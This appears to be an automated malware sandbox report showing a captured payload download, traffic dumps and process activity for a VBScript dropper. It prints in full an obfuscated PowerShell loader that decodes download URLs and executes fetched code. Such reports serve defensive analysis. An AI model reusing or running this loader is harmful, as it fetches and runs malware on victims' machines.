                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 66 2b 54 56 43 4b 33 66 51 41 71 67 58 72 74 30 68 52 67 51 39 69 70 44 51 48 57 76 33 73 57 76 72 67 67 4a 38 58 30 59 78 61 79 75 33 30 41 70 75 6f 75 4a 39 56 58 47 77 63 42 32 33 6b 42 31 47 62 54 34 2b 63 6e 6d 6d 66 46 41 58 76 57 73 72 74 39 41 6d 34 2b 62 70 2f 51 61 42 6b 46 31 72 39 73 65 33 51 31 62 74 45 34 69 42 6b 46 31 72 39 44 46 49 46 41 67 76 2f 51 53 51 30 42 31 72 37 2b 71 64 61 2f 51 7a 34 4e 52 49 4c 2b 79 4b 71 56 43 64 61 39 73 2f 38 67 75 75 58 6d 6d 4c 6d 6f 36 64 36 2f 66 63 74 4e 65 73 38 48 41 31 64 31 41 64 63 75 65 6b 2b 45 72 48 63 48 59 31 64 31 41 64 55 71 48 33 77 7a 4a 57 6f 68 4f 45 71 56 43 64 61 2f 51 7a 4d 39 52 49 4c 39 4e 51 56 62 31 42 4b 33 66 51 45 31 32 59 59 35 75 56 2b 4f 33 74 2b 63 59 4f 6e 63 75 4b 64 48
                                                                                                              Data Ascii: f+TVCK3fQAqgXrt0hRgQ9ipDQHWv3sWvrggJ8X0Yxayu30ApuouJ9VXGwcB23kB1GbT4+cnmmfFAXvWsrt9Am4+bp/QaBkF1r9se3Q1btE4iBkF1r9DFIFAgv/QSQ0B1r7+qda/Qz4NRIL+yKqVCda9s/8guuXmmLmo6d6/fctNes8HA1d1Adcuek+ErHcHY1d1AdUqH3wzJWohOEqVCda/QzM9RIL9NQVb1BK3fQE12YY5uV+O3t+cYOncuKdH
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 4a 68 77 54 2f 6a 4a 61 51 58 57 76 4e 33 5a 58 72 39 38 52 7a 45 72 32 45 30 4d 75 4c 6d 46 46 6f 33 66 42 68 42 4c 76 77 64 55 75 4c 72 2b 35 48 5a 7a 42 6e 4e 2f 4e 4c 41 67 6d 35 6a 66 56 2f 6b 70 47 34 4f 52 4b 71 30 48 6c 63 6e 34 54 6c 71 51 6a 6a 77 34 61 6e 45 71 79 6a 57 31 4e 68 5a 4f 41 4b 51 66 59 42 48 55 64 55 50 79 49 6e 35 38 43 35 66 4d 49 47 66 77 71 54 45 46 31 72 31 61 59 49 68 41 48 53 43 4e 52 58 72 63 57 2f 4f 77 6b 39 46 67 2f 41 57 33 2b 58 71 2f 65 52 4b 43 6c 39 47 69 6c 57 58 61 31 56 6b 39 53 43 73 68 78 56 72 47 6e 39 74 4b 78 41 6b 44 48 7a 54 2f 31 2f 4f 68 52 4e 31 5a 72 72 45 4c 53 36 78 61 4a 4e 7a 45 65 41 69 37 79 4c 61 61 54 66 46 64 37 4b 76 2b 50 2b 47 73 45 4d 4f 4e 41 51 6a 6d 71 4e 71 72 53 38 34 2b 77 69 4e 7a
                                                                                                              Data Ascii: JhwT/jJaQXWvN3ZXr98RzEr2E0MuLmFFo3fBhBLvwdUuLr+5HZzBnN/NLAgm5jfV/kpG4ORKq0Hlcn4TlqQjjw4anEqyjW1NhZOAKQfYBHUdUPyIn58C5fMIGfwqTEF1r1aYIhAHSCNRXrcW/Owk9Fg/AW3+Xq/eRKCl9GilWXa1Vk9SCshxVrGn9tKxAkDHzT/1/OhRN1ZrrELS6xaJNzEeAi7yLaaTfFd7Kv+P+GsEMONAQjmqNqrS84+wiNz
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 32 53 2b 62 39 47 36 79 72 54 56 44 58 6f 45 58 67 52 42 33 2f 4c 62 77 44 62 70 4c 6e 62 64 69 47 44 50 7a 39 4b 48 42 4b 33 79 6e 37 6c 34 34 45 34 30 6e 49 4c 59 55 79 72 33 69 50 70 58 2f 31 79 73 5a 75 56 77 65 2f 68 74 78 6d 59 6c 4c 35 69 55 6c 58 6f 65 58 4a 6a 66 69 57 51 4b 67 36 77 46 73 41 6a 2f 48 59 65 69 56 59 44 79 2b 4e 68 52 5a 32 30 6d 68 63 31 30 70 46 68 48 4b 48 39 42 42 61 7a 72 66 51 48 57 76 33 30 42 31 72 39 39 41 64 66 35 4c 43 4d 79 78 2f 6f 41 2b 43 43 57 4d 66 6b 6b 79 53 74 6d 4b 56 59 4f 70 72 43 6f 37 6b 4a 4f 79 59 48 62 77 76 74 65 67 37 73 53 76 6b 62 6c 4c 31 4c 52 53 53 66 63 45 64 4f 57 6b 4a 78 56 46 4e 4d 5a 31 58 72 4a 33 76 2f 78 38 39 47 32 33 33 42 71 32 69 4e 7a 38 53 4e 35 58 36 4d 6c 61 75 67 75 6c 5a 74 59
                                                                                                              Data Ascii: 2S+b9G6yrTVDXoEXgRB3/LbwDbpLnbdiGDPz9KHBK3yn7l44E40nILYUyr3iPpX/1ysZuVwe/htxmYlL5iUlXoeXJjfiWQKg6wFsAj/HYeiVYDy+NhRZ20mhc10pFhHKH9BBazrfQHWv30B1r99Adf5LCMyx/oA+CCWMfkkyStmKVYOprCo7kJOyYHbwvteg7sSvkblL1LRSSfcEdOWkJxVFNMZ1XrJ3v/x89G233Bq2iNz8SN5X6MlaugulZtY


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.749831202.71.109.2284436920C:\Windows\SysWOW64\msiexec.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:15 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: www.tdejb.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-05 09:39:15 UTC223INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Server: Apache
                                                                                                              Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 449600
                                                                                                              Connection: close
                                                                                                              Content-Type: application/octet-stream
                                                                                                              2024-12-05 09:39:15 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                                              Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                                              Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                                              Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                                              Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                                              Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                                              Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                                              Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                                              Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                                              Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                                              2024-12-05 09:39:16 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                                              Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:04:38:16
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ab.vbs"
                                                                                                              Imagebase:0x7ff683320000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:04:38:17
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:wmic diskdrive get caption,serialnumber
                                                                                                              Imagebase:0x7ff750620000
                                                                                                              File size:576'000 bytes
                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:04:38:17
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:04:38:19
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') 